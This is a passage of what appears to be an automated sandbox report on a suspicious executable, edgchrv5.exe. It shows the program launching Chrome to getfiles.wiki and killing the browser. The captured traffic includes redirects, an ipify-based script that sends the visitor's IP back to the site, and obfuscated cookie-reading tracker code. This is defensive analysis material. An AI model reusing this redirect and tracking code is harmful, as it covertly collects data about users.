Ascii: on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
2023-06-12 17:07:12 UTC	27	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49716	35.190.80.1	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:12 UTC	27	OUT	OPTIONS /report/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3 HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://getfiles.wiki Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:12 UTC	28	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Mon, 12 Jun 2023 17:07:12 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49717	35.190.80.1	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:12 UTC	28	OUT	POST /report/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3 HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 461 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:12 UTC	29	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 30 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 4d 54 41 79 4c 6a 45 79 4f 53 34 78 4e 44 4d 75 4e 7a 63 3d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 Data Ascii: [{"age":4,"body":{"elapsed_time":305,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=","sampling_fraction":1.0,"server_ip":"188.114.97.7","status_code":404,"type":"
2023-06-12 17:07:12 UTC	29	IN	HTTP/1.1 200 OK Content-Length: 0 date: Mon, 12 Jun 2023 17:07:11 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49700	188.114.97.7	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:05 UTC	1	OUT	GET /welcome.php HTTP/1.1 Host: getfiles.wiki Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:05 UTC	4	IN	HTTP/1.1 302 Found Date: Mon, 12 Jun 2023 17:07:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close location: https://exturl.com/r.php?key=pvwarw3 cache-control: no-cache, no-store, must-revalidate, max-age=0 vary: User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NYJi5YdYRw%2FdhwUj9%2BETQRcFx0qP7sMv9S7PMjJpIsEk%2FEp0BQoWfCd5IyB9GjbtogUOrvjcNRVEein7WQTOdpXJIFpzReq9hfjLjV7jLgaUkJJ0FZxbUWikzuI3oZ1%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d63b0264ff1bb74-FRA alt-svc: h3=":443"; ma=86400
2023-06-12 17:07:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49703	142.250.203.110	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:05 UTC	5	OUT	GET /webstore/inlineinstall/detail/ecffbknobglofafinobbcmaionnihcma HTTP/1.1 Host: chrome.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:05 UTC	6	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 12 Jun 2023 17:07:05 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-OUKiuXTGfIwuxOWZhMdFvQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';worker-src 'self';report-uri /webstore/cspreport Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/chromewebstore/2 Report-To: {"group":"coop_chromewebstore","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/chromewebstore"}]} Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="coop_chromewebstore" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Set-Cookie: NID=511=O-41PZOM4JAM3O6mR84aHb-HJ-jhkNo9A_SU_tcUFwraceM8b7md4ZwaxRCSxgUzeWp1LDTBoywCojdX06a53Hjy_wzxWMkPy7y7icAKwm1K6JVsR4TrPpFgmtoaBUQ_1Pn_zAV4OOERT7LeniKI1zSAXY-itFT79HH5kFMsDuc; expires=Tue, 12-Dec-2023 17:07:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-06-12 17:07:05 UTC	7	IN	Data Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 78 38 77 55 43 70 65 61 74 4e 4e 43 65 4f 6e 73 6f 6b 54 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Zx8wUCpeatNNCeOnsokT1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2023-06-12 17:07:05 UTC	8	IN	Data Raw: 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 Data Ascii: y:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this se
2023-06-12 17:07:05 UTC	9	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49702	38.128.66.115	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:06 UTC	9	OUT	GET /r.php?key=pvwarw3 HTTP/1.1 Host: exturl.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:06 UTC	9	IN	HTTP/1.1 302 Found Server: nginx/1.22.0 Date: Mon, 12 Jun 2023 17:07:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: uclick=usj2pmqefe; expires=Tue, 13-Jun-2023 17:07:06 GMT; Max-Age=86400; path=/; secure; SameSite=none Set-Cookie: uclickhash=usj2pmqefe-usj2pmqefe-bzfe-0-qdi4-hqbl-hqwj-9564be; expires=Tue, 13-Jun-2023 17:07:06 GMT; Max-Age=86400; path=/; secure; SameSite=none Location: https://getfiles.wiki/redirect.php Strict-Transport-Security: max-age=31536000
2023-06-12 17:07:06 UTC	10	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49704	188.114.97.7	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:06 UTC	10	OUT	GET /redirect.php HTTP/1.1 Host: getfiles.wiki Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:06 UTC	10	IN	HTTP/1.1 200 OK Date: Mon, 12 Jun 2023 17:07:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding,User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VW7jP80ZVnnMMlhxHVl22TRfgjKEJsiROZz2rH1sBI9SD9WbfqyE1lII8s%2FcMQwTMNBKIbem5CeRT13FHIPlmqe2rw2rJtlM5DP1zbqdIBoch45fmclAj87HvVYEUzkv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d63b02d19a63669-FRA alt-svc: h3=":443"; ma=86400
2023-06-12 17:07:06 UTC	11	IN	Data Raw: 31 32 36 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 49 50 28 6a 73 6f 6e 29 20 7b 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 22 2b 62 74 6f 61 28 6a 73 6f 6e 2e 69 70 29 3b 0d 0a 20 20 20 20 65 78 69 74 28 29 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 69 70 69 66 79 2e Data Ascii: 126<script type="application/javascript"> function getIP(json) { window.location.href = "https://getfiles.wiki/redirect.php?gjhagdjfbdjk="+btoa(json.ip); exit(); }</script><script type="application/javascript" src="https://api.ipify.
2023-06-12 17:07:06 UTC	11	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49705	173.231.16.76	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:09 UTC	11	OUT	GET /?format=jsonp&callback=getIP HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:09 UTC	12	IN	HTTP/1.1 200 OK Content-Length: 31 Content-Type: application/javascript Date: Mon, 12 Jun 2023 17:07:09 GMT Vary: Origin Connection: close
2023-06-12 17:07:09 UTC	12	IN	Data Raw: 67 65 74 49 50 28 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 37 22 7d 29 3b Data Ascii: getIP({"ip":"102.129.143.77"});

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49708	188.114.97.7	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:09 UTC	12	OUT	GET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc= HTTP/1.1 Host: getfiles.wiki Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://getfiles.wiki/redirect.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:10 UTC	13	IN	HTTP/1.1 200 OK Date: Mon, 12 Jun 2023 17:07:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding,User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xi2Ir5KTI1HULRNRultxXyBlgJhClKZ1MLWFfB9qQgLzO6MFXf30yc4XA3gRd8CawKdIkPqJnzpRS7xHl%2Bo7rCXla7JgRPr7UYaXpyssuM%2B1GMMDjvjxqairRFcdTMWu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d63b0410b17bb50-FRA alt-svc: h3=":443"; ma=86400
2023-06-12 17:07:10 UTC	13	IN	Data Raw: 64 66 30 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 30 Data Ascii: df0<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"><style>body { background-color: #0000
2023-06-12 17:07:10 UTC	14	IN	Data Raw: 72 26 26 28 72 3d 22 75 63 6c 69 63 6b 22 29 3b 76 61 72 20 63 2c 74 2c 75 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 22 75 63 6c 69 63 6b 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29 7d 29 28 72 29 7d 29 29 2c 69 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 Data Ascii: r&&(r="uclick");var c,t,u=e((function(){return(function(n){return void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^\|; )(clickid\|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){ret
2023-06-12 17:07:10 UTC	15	IN	Data Raw: 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29 7d 29 28 72 29 7d 29 29 2c 69 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 72 29 7d 29 29 2c 6f 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2c 72 29 7d 29 29 3b 72 65 Data Ascii: "),Array.from(document.cookie.matchAll(new RegExp("(?:^\|; )(clickid\|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){return n(document.referrer,r)})),o=e((function(){return n(document.location.search,r)}));re
2023-06-12 17:07:10 UTC	17	IN	Data Raw: 30 38 37 38 37 26 31 30 31 22 20 61 6c 74 3d 22 77 65 62 20 6c 6f 67 20 66 72 65 65 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 48 69 73 74 61 74 73 2e 63 6f 6d 20 20 45 4e 44 20 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 08787&101" alt="web log free" border="0"></a></noscript>... Histats.com END --></html>
2023-06-12 17:07:10 UTC	17	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49711	38.128.66.115	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:10 UTC	17	OUT	GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1 Host: campaignkeepy.buzz Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:10 UTC	18	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Mon, 12 Jun 2023 17:07:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Strict-Transport-Security: max-age=31536000
2023-06-12 17:07:10 UTC	18	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49709	38.128.66.115	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-12 17:07:10 UTC	17	OUT	GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1 Host: campaignkejfcv.buzz Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-06-12 17:07:10 UTC	18	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Mon, 12 Jun 2023 17:07:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Strict-Transport-Security: max-age=31536000
2023-06-12 17:07:10 UTC	18	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: edgchrv5.exePID: 5884, Parent PID: 3452

General

Target ID:	0
Start time:	19:07:01
Start date:	12/06/2023
Path:	C:\Users\user\Desktop\edgchrv5.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\edgchrv5.exe
Imagebase:	0x1000000
File size:	209776 bytes
MD5 hash:	0C0A3D01C45F66056D607BBAD486B39B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 1264, Parent PID: 5884

General

Target ID:	1
Start time:	19:07:02
Start date:	12/06/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 7044, Parent PID: 5884

General

Target ID:	2
Start time:	19:07:02
Start date:	12/06/2023
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	/IM chrome.exe
Imagebase:	0xc20000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7036, Parent PID: 7044

General

Target ID:	3
